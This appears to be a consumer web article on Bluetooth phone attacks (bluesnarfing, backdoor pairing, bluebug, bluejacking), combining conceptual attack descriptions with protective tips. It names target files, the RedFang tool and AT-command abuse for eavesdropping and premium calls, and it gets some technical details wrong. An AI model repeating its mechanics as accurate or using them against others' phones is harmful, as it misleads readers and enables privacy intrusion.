Mobile Phones: Bluesnarfing
Bluesnarfing
Everyone is aware of the attraction of mobile phones, as physical devices, to thieves. But modern mobile phones are also powerful multi-function electronic devices. They are often a combination of telephone, music player and electronic organizer. They can contain a lot of valuable information (including sensitive personal information) and have many ways of transferring that information to other mobiles and to computers. In this article I am going to brinig to your attention just one of the connection methods that can be vulnerable to attack if you're not careful: Bluetooth.
Bluetooth
Bluetooth is a specification for short-range wireless personal area networks that allows devices such as mobile phones, laptops, PCs, printers, digital cameras, and video game consoles to connect and exchange information over a secure short-range radio frequency. What makes Bluetooth unique is that the frequency used is globally unlicensed ie the radio frequency is clear and available in every country of the world.
The Bluetooth specification was developed in 1994 by Sven Mattisson and Jaap Haartsen, who were working for Ericsson Mobile Platforms in Lund, Sweden. It is now a global standard formalized by the Bluetooth Special Interest Group (SIG) which was announced on May 20 1998. Due to its Swedish origins, Bluetooth was named after a Danish king of the late 900s, Harald Bluetooth, who is known for the unification of previously warring tribes from Denmark (including Scania, present-day Sweden, where the Bluetooth technology was invented), and Norway. The logo istelf (see left) merges the Nordic runes analogous to the modern Latin H and B: (haglaz) and (berkanan) forming a bind rune. The symbol also looks like a capital B for 'Bluetooth' merged for an asterisk symbol for a network.
Most of the latest mobile phones include bluetooth built-in as this allows the handsets to communicate with computers, with other mobile phones and with devices such as mobile phone headsets. Bluetooth links can also connect mobile phones to broadband connections so that the mobile can work as an internet phone.
If you're looking for an abbreviation you can use the alphabetical links below or the links on the right to find any mobile phone SMS abbreviation you desire.
Bluetooth Vulnerabilities — Bluesnarfing
Bluesnarfing is defined as 'the unauthorized access of information from a wireless device through a Bluetooth connection'. The truth is that any device with its Bluetooth connection turned on and set to "discoverable" (able to be found by other Bluetooth devices in range) can be attacked. This makes mobile phones particularly vulnerable, especially if they're being used with bluetooth earpieces, are communicationg with other bluetooth devices or are connecting to PCs or laptops via a bluetooth connection.
Normally a user will 'beam' his/her business card to another user. The protocol here being a 'push' like that for the internet protocol. However, in a SNARF attack, instead of pushing a business card to the other device the attacker attempts to pull data using a 'get' request that seeks files with known names such as the phonebook file (telecom/pb.vcf) or the calendar file (telecom/cal.vcs). This is normally only possible if the device is in "discoverable" or "visible" mode, but there are tools available on the Internet that allow even this safety net to be bypassed.
To achieve this the Bluesnarfing software needs to address the device by its uninque 48-bit Bluetooth device name. Software such as RedFang has been written for this, but as there are 281,474,976,710,656 possible addresses to guess from the approach can only be done with brute force and it can take several hours for any given device to be attacked. Which is not to say that it isn't possible. The latest releases of the Bluetooth specification (v1.2 and 2.0) have addressed this problem to a significant extend — just ensure that the firmware for your phone is up-to-date. Also, if you're not using bluetooth then make certain that it's turned off as then there is no possibility of any vulnerability. Some manufacturers, like Motorola have only made bluetooth accessible on their phones for 60s; when the mobile phone is seeking a bluetooth device to connect to.
Bluetooth Vulnerabilities — Backdoor Attack
The backdoor attack involves establishing a trust relationship through a bluetooth device's 'pairing' mechanism, but ensuring that it no longer appears in the target's register of paired devices. In this way, unless the owner is actually observing their device at the precise moment a connection is established, they are unlikely to notice anything untoward, and the attacker may be free to continue to use any resource that a trusted relationship with that device grants access to. This means that not only can data be retrieved from the phone, but other services, such as modems or Internet, WAP and GPRS gateways may be accessed without the owner's knowledge or consent.
To permanently remove a backdoor-type attack the only way is to remove all devices from the list of paired devices. However, the only way to protect against this is to use a 'factory reset' on your phone and then you lose all other data! However, if your bluetooth connection is not on then, once again, you cannot be attacked.
Bluetooth Vulnerabilities — BLUEBUG Attack
The bluebug attack creates a serial profile connection to the device, thereby giving full access to the AT command set, which can then be exploited using standard off the shelf tools, such as PPP for networking and gnokii for messaging, contact management, diverts and initiating calls. With this facility, it is possible to use the phone to initiate calls to premium rate numbers, send sms messages, read sms messages, connect to data services such as the Internet, and even monitor conversations in the vicinity of the phone. This latter is done via a voice call over the GSM network, so the listening post can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, allowing the owner's incoming calls to be intercepted, either to provide a channel for calls to more expensive destinations, or for identity theft by impersonation of the victim.
Bluetooth Vulnerabilities — Bluejacking
Bluejacking involves an abuse of the bluetooth 'pairing' protocol too attack a vulnerability in the message passing between devides that occurs during the 'handshake' phase. This kind of attack works because the protocol being abused is designed for information exchange. The ability to interface with other devices and exchange, update and synchronise data, is the raison d'être of bluetooth. The bluejacking technique is using the first part of a process that allows that exchange to take place, and is therefore open to further abuse if the handshake completes and the "bluejacker" successfully pairs with the target device. If such an event occurs, then all data on the target device bacomes available to the initiator, including such things as phone books, calendars, pictures and text messages. However, for Bluejacking to work you actively have to accept the connection to the second device. If you have not initiated that conection and you are not aware of anyone trusted attempting to connect to you 'just say no'.